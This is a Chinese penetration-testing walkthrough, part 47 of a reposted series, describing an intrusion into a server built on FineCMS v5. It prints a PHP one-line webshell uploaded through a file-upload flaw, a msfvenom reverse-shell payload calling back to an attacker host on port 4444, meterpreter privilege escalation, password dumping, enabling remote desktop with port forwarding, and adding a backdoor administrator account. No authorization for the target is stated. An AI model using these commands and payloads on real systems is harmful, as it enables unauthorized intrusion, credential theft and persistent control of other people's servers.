【渗透实战系列】|47-一次内网渗透

admin 2022年8月14日14:29:16安全文章评论29 views2915字阅读9分43秒阅读模式

webshell

访问某网站,该网站利用的是FineCMS v5系统建站,创建一个新的用户进行测试。

【渗透实战系列】|47-一次内网渗透

通过建站系统存在的漏洞进行webshell,利用FineCMS v5 的文件上传漏洞,获取官网系统的Webshell。

参考链接:https://blog.csdn.net/dfdhxb995397/article/details/101384946

【渗透实战系列】|47-一次内网渗透

上传一句话木马文件,并且通过burpsuite软件抓包来修改参数

<?php  eval($_POST['v']); ?>

【渗透实战系列】|47-一次内网渗透

最开始的文件格式是0x0.png

通过burp代理拦截将tx后面的image/png换成image/php即可

【渗透实战系列】|47-一次内网渗透

访问目标网站文件上传的路径,并且输入参数v=phpinfo();验证一句话木马是否上传成功

【渗透实战系列】|47-一次内网渗透

验证上传成功后,打开菜刀软件输入上传的网站路径和参数(一句话木马的密码),可以连接服务器

【渗透实战系列】|47-一次内网渗透

getshell/提权

通过webshell连接目标服务器,但是访问的数据有限,仅仅是站点的系统账户权限,访问的系统路径也有限,于是我们可以编写免杀木马来进行反弹shell

在kali中生成反弹木马su.exe

Msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f exe >/root/Desktop/su.exe

【渗透实战系列】|47-一次内网渗透

利用刚刚webshell连接菜刀的操作,在文件管理模块中上传我们需要的工具ew.exe、lcx.exe、su.exe

【渗透实战系列】|47-一次内网渗透

在kali中进入meterpreter攻击模块,配置参数监听端口

【渗透实战系列】|47-一次内网渗透

利用菜刀软件的虚拟终端模拟win2008服务器点击免杀木马的操作,让木马生效

【渗透实战系列】|47-一次内网渗透

kali监听端口获取反弹shell,出现meterpreter模块代表获取成功,可以输入getsystem来提升权限【渗透实战系列】|47-一次内网渗透

获取windows系统的登入密码(Administrator/Windows2008)

【渗透实战系列】|47-一次内网渗透

获取windows系统账号密码后,可以尝试远程登录目标电脑

如果win2008的远程桌面操作是不允许连接到这台计算机,那么开启端口转发也是没用的,如下所示

netstat -ano查看开放端口

【渗透实战系列】|47-一次内网渗透

【渗透实战系列】|47-一次内网渗透

在kali的反弹shell模块先开启目标电脑的远程桌面run getgui -e

【渗透实战系列】|47-一次内网渗透

netstat -ano再次查看端口情况,发现3389远程端口开放

【渗透实战系列】|47-一次内网渗透

然后在kali上开启端口转发,-l(本地端口)-p(远程控制端口)-r(目标主机)

目标主机可以通过模拟终端ipconfig指令查看ip地址,本机地址通过ifconfig查看ip地址

靶机3389端口转发发送到本地的5555端口portfwd add -l 5555 -p 3389 -r 192.168.10.10  (模拟目标主机)

【渗透实战系列】|47-一次内网渗透

Rdesktop -u 用户名 -p 密码 127.0.0.1:5555 连接本地的5555端口开启远程桌面

本机kali输入rdesktop -u Administrator -p Windows2008 127.0.0.1:5555

可以看到linux接收到目标主机的远程登录界面

【渗透实战系列】|47-一次内网渗透

当我们控制了目标主机,并且能够远程登录之后,就可以执行各种操作,并且权限为root权限。

可以增加新用户net user su su /add,加入系统组net localgroup Administrators su /add

可以上传上兴远控软件,方便本机系统远程登录目标主机

【渗透实战系列】|47-一次内网渗透

总结:不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。

本文作者:和风sukf, 转载请注明来自FreeBuf.COM




渗透实战系列


【渗透实战系列】|46-渗透测试:从Web到内网

【渗透实战系列】|45-记一次渗透实战-代码审计到getshell

【渗透实战系列】|44-记一次授权渗透实战(过程曲折,Java getshell)

【渗透实战系列】|43-某次通用型漏洞挖掘思路分享

【渗透实战系列】|42-防范诈骗,记一次帮助粉丝渗透黑入某盘诈骗的实战

【渗透实战系列】|41-记一次色*情app渗透测试

【渗透实战系列】|40-APP渗透测试步骤(环境、代理、抓包挖洞)

▶【渗透实战系列】|39-BC渗透的常见切入点(总结)

【渗透实战系列】|38-对某色情直播渗透

【渗透实战系列】|37-6年级小学生把学校的网站给搞了!

【渗透实战系列】|36-一次bc推广渗透实战

【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透

【渗透实战系列】|34-如何用渗透思路分析网贷诈骗链

【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP

【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站

【渗透实战系列】|31-记一次对学校的渗透测试

【渗透实战系列】|30-从SQL注入渗透内网(渗透的本质就是信息搜集)

【渗透实战系列】|29-实战|对某勒索APP的Getshell

【渗透实战系列】|28-我是如何拿下BC站的服务器

【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试(成功获取管理员真实IP)

【渗透实战系列】|26一记某cms审计过程(步骤详细)

【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程

【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法

【渗透实战系列】|23-某菠菜网站渗透实战

【渗透实战系列】|22-渗透系列之打击彩票站

【渗透实战系列】|21一次理财杀猪盘渗透测试案例

【渗透实战系列】|20-渗透直播网站

【渗透实战系列】|19-杀猪盘渗透测试

【渗透实战系列】|18-手动拿学校站点 得到上万人的信息(漏洞已提交)

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

【渗透实战系列】|16-裸聊APP渗透测试

【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点

【渗透实战系列】|14-对诈骗(杀猪盘)网站的渗透测试

【渗透实战系列】|13-waf绕过拿下赌博网站

【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)

【渗透实战系列】|9-对境外网站开展的一次web渗透测试(非常详细,适合打战练手)

【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)

【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

【渗透实战系列】|6- BC杀猪盘渗透一条龙

【渗透实战系列】|5-记一次内衣网站渗透测试

【渗透实战系列】|4-看我如何拿下BC站的服务器

【渗透实战系列】|3-一次简单的渗透

【渗透实战系列】|2-记一次后门爆破到提权实战案例

【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)

【渗透实战系列】|47-一次内网渗透

    

长按-识别-关注

【渗透实战系列】|47-一次内网渗透

Hacking黑白红

一个专注信息安全技术的学习平台

【渗透实战系列】|47-一次内网渗透

点分享

【渗透实战系列】|47-一次内网渗透

点收藏

【渗透实战系列】|47-一次内网渗透

点点赞

【渗透实战系列】|47-一次内网渗透

点在看



原文始发于微信公众号(Hacking黑白红):【渗透实战系列】|47-一次内网渗透

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月14日14:29:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【渗透实战系列】|47-一次内网渗透 http://cn-sec.com/archives/1236152.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: